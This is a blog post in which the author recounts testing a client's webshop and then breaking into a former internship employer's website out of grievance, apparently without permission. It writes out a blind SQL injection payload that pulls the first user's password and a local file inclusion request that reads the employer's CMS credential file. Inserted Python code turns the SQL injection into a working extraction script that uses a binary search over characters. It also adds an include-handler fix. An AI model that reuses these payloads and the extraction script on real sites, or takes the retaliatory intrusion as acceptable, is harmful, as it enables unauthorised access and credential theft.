Tuesday, June 16, 2009

My old internship company

A year ago I did my orientation internship at a web development company that mainly programmed in ASP and ASP.NET, both languages I utterly hate for their lack of clarity and flexibility. I had to work for them for 10 weeks, which wasn't that much. After about 7 or 8 weeks they offered me a contract that would let me work for them 0-10 hours a week at a quite okay pay rate. I accepted, signed the contract, and we were happy. After the 10 weeks I had to turn in my paper covering the 10 weeks I worked at this company. The paper was very critical, and like many people, they didn't like being judged by an 'intern'. So I could give them back the contract and I was basically fired before starting. Well, that's not completely true: I worked 10 hours for them and I didn't get paid. Evil.

Anyway, to get to the point: they recently delivered a webshop, actually written in PHP, so I had to test it for holes. And yes, SQL injection, except that this one was a little tricky: I always got an 'OK' message, so I had to find a way around this. I tried the following:

id=246 AND IF(1=(SELECT CHAR_LENGTH(pass) FROM users LIMIT 0,1),1,(SELECT 1 UNION SELECT 2))

What this does: IF() compares the guessed length with CHAR_LENGTH() of the first user's password. When the guess matches, the true branch returns 1 and the page renders normally. When it doesn't, MySQL evaluates the false branch, a scalar subquery that returns two rows, and aborts the query with the error "Subquery returns more than 1 row". The always-'OK' page thus turns into an error page exactly when the condition is false, which is the yes/no signal a blind injection needs. Repeating the probe with different lengths finds the real length; the same wrapper around ASCII(SUBSTRING(pass, n, 1)) comparisons then recovers the value one character at a time.
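The probe above, carried through to a full extraction, as an added example that is not part of the original post. It builds the exact payload from the post, then drives the yes/no oracle first over candidate lengths and then, going beyond the post, with a binary search over ASCII codes per position (7 requests per character instead of up to 128). The target is a constructed in-memory SQLite database standing in for the webshop, with MySQL's CHAR_LENGTH/ASCII/SUBSTRING registered as user functions; the users row, the product id 246 and the column name pass are assumptions, and because SQLite does not raise on a multi-row scalar subquery, a false condition yields no product row instead of the MySQL error page.

```python
import sqlite3
from typing import Callable

# Constructed sample row standing in for the webshop's real users table (hypothetical data).
SAMPLE_USERS = [("admin", "admin@example.com", "Passw0rd")]


def length_condition(n: int) -> str:
    """The post's probe: true when the first user's password is exactly n characters long."""
    return f"{n}=(SELECT CHAR_LENGTH(pass) FROM users LIMIT 0,1)"


def char_gt_condition(pos: int, code: int) -> str:
    """True when character `pos` (1-based, as in MySQL SUBSTRING) of that password
    has an ASCII code greater than `code`."""
    return f"(SELECT ASCII(SUBSTRING(pass,{pos},1)) FROM users LIMIT 0,1)>{code}"


def mysql_payload(condition: str, product_id: int = 246) -> str:
    """Wrap a condition the way the post does. A true condition makes IF() return 1 and
    the page renders normally; a false one makes MySQL evaluate a scalar subquery that
    yields two rows, which fails with 'Subquery returns more than 1 row'."""
    return f"{product_id} AND IF({condition},1,(SELECT 1 UNION SELECT 2))"


def extract_password(oracle: Callable[[str], bool], max_len: int = 64) -> str:
    """Recover the first user's password from yes/no answers alone.

    `oracle(condition)` must return True when the page answers 'OK' for that condition
    and False when it answers with the subquery error."""
    length = next((n for n in range(1, max_len + 1) if oracle(length_condition(n))), None)
    if length is None:
        raise RuntimeError("no length up to max_len matched; oracle broken or value too long")
    chars = []
    for pos in range(1, length + 1):
        # Binary search over 7-bit ASCII: 7 requests per character instead of up to 128.
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(char_gt_condition(pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def make_simulated_oracle() -> Callable[[str], bool]:
    """Stand-in for the vulnerable page, built on SQLite so this runs offline.

    SQLite lacks CHAR_LENGTH/ASCII/SUBSTRING, so MySQL-compatible versions are registered.
    SQLite also does not raise on a multi-row scalar subquery, so the IF()/UNION error
    trick cannot be reproduced here; a false condition simply yields no product row,
    which plays the role of the error page."""
    db = sqlite3.connect(":memory:")
    db.create_function("CHAR_LENGTH", 1, lambda s: len(s))
    db.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)
    db.create_function("SUBSTRING", 3, lambda s, p, n: s[p - 1:p - 1 + n])
    db.execute("CREATE TABLE users(name TEXT, email TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?)", SAMPLE_USERS)
    db.execute("CREATE TABLE products(id INTEGER, name TEXT)")
    db.execute("INSERT INTO products VALUES (246, 'widget')")

    def page_returns_ok(condition: str) -> bool:
        # Vulnerable pattern: attacker-controlled text lands straight in the WHERE clause.
        query = f"SELECT name FROM products WHERE id=246 AND ({condition})"
        return db.execute(query).fetchone() is not None

    return page_returns_ok


if __name__ == "__main__":
    print("payload for length 1:", mysql_payload(length_condition(1)))
    print("recovered:", extract_password(make_simulated_oracle()))
```

Against a real MySQL target the oracle would send mysql_payload(condition) as the id parameter and return True when the response is the normal page rather than the subquery error; everything else in extract_password stays the same.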

So an exploit was in place, and soon I had the first user's email and password. The funny part was that I suspect this first user is the one who wrote the webshop. He works at a different company than the one where I did my internship. It turns out that this other company is in the same building where I work now. Funny.

Anyway, there's nothing more hilarious than trying to hack the website of the company where I did my orientation internship. Before actually going into this I have to tell you one of the things I disliked a lot about this company: they didn't use any databases. They used... XML files! For everything. Really. I mean, come on...

OK, now back to their website. It didn't take me long with this one. Since they use XML files instead of a database, there's no SQL to inject, so a different approach was needed: local file inclusion.

page.asp?inc=cgi-bin/xmldocs/b_users.xml

The above request gave me all the usernames and passwords for their content management system: the inc parameter is used as a file path without any check, so pointing it at the XML file that holds the CMS accounts instead of a page fragment simply returns that file.
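The include handler as described, beside a hardened version, as an added example that is not part of the original post or the company's code. It recreates the relevant layout in a temporary directory (the includes/ directory, the page names home/contact and the XML contents are assumptions; only the path cgi-bin/xmldocs/b_users.xml comes from the post) and shows that the unchecked handler serves the credential file while an allowlist plus a resolved-path check refuses it.

```python
import tempfile
from pathlib import Path

# Hypothetical layout: a page-fragment directory plus the XML store the post says
# the CMS kept its accounts in. The credentials below are constructed sample data.
INCLUDE_DIR = "includes"
ALLOWED_INCLUDES = {"home": "home.asp", "contact": "contact.asp"}


def build_sample_webroot() -> Path:
    root = Path(tempfile.mkdtemp(prefix="lfi_demo_"))
    (root / INCLUDE_DIR).mkdir()
    (root / INCLUDE_DIR / "home.asp").write_text("<h1>Home</h1>")
    (root / "cgi-bin" / "xmldocs").mkdir(parents=True)
    (root / "cgi-bin" / "xmldocs" / "b_users.xml").write_text(
        "<users><user name='admin' pass='letmein'/>"
        "<user name='editor' pass='letmein'/></users>"
    )
    return root


def vulnerable_include(root: Path, inc: str) -> str:
    """page.asp?inc=... as the post describes it: the parameter is treated as a path
    relative to the web root and read without any check, so any file the web server
    process can read is served, the XML credential store included."""
    return (root / inc).read_text()


def hardened_include(root: Path, inc: str) -> str:
    """Same feature with the two checks a reviewer would ask for: the parameter is a
    key into an allowlist, never a path, and the resolved file must still be inside
    the include directory (defence in depth against a bad allowlist entry or symlink)."""
    if inc not in ALLOWED_INCLUDES:
        raise PermissionError(f"unknown include {inc!r}")
    base = (root / INCLUDE_DIR).resolve()
    target = (base / ALLOWED_INCLUDES[inc]).resolve()
    if base not in target.parents:
        raise PermissionError("include resolves outside the include directory")
    return target.read_text()


def run_demo() -> dict:
    """Exercise both handlers with the exact parameter value from the post."""
    root = build_sample_webroot()
    attack = "cgi-bin/xmldocs/b_users.xml"
    results = {
        "vulnerable_leaks_users": "pass=" in vulnerable_include(root, attack),
        "hardened_serves_home": hardened_include(root, "home") == "<h1>Home</h1>",
    }
    try:
        hardened_include(root, attack)
        results["hardened_blocks_attack"] = False
    except PermissionError:
        results["hardened_blocks_attack"] = True
    return results


if __name__ == "__main__":
    print(run_demo())
```

The allowlist is the real fix; the path check only limits the damage if the allowlist is ever populated from configuration someone can edit. Keeping account data in a file under the web root at all is the deeper problem, since any read primitive, not just this one, exposes it.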

All their passwords were the same. Another point for the critique!
